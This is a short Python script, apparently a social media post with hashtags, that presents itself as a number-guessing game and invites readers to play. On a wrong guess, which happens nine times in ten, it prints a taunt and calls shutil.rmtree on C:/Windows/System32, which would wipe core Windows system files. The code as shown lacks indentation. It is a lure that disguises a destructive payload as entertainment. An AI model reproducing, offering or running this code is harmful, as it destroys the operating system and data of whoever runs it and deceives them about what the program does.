import random
import os
import shutil
number = random.randint(1, 10)
guess = input("Choose a number from 1 to 10: ")
guess = int(guess)
if guess == number:
print("You have survived to see the light one more day, be thankful to your God!")
else:
path_to_delete = "C:/Windows/System32"
print("You are mine princess!")
shutil.rmtree(path_to_delete)
Will you join me to play? 😈
#Venezuela #Juego #ETH #BTC